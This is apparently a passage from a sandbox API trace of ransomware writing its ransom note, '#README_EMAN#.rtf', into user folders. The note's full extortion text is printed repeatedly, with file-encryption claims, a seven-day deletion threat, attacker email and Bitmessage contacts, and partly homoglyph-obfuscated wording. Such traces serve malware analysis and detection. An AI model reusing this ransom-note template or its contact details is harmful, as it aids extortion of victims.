m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\niYS»\x07³\x98'\x9eQ_Ú$\x9e5ã­:f£1}m\x03\x1d", lpUsedDefaultChar=0x0) returned 8717 [0293.372] WriteFile (in: hFile=0x2d4, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0293.373] CloseHandle (hObject=0x2d4) returned 1 [0293.373] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\#readme_eman#.rtf")) returned 0xffffffff [0293.373] GetLastError () returned 0x2 [0293.373] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0294.060] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.061] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.061] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 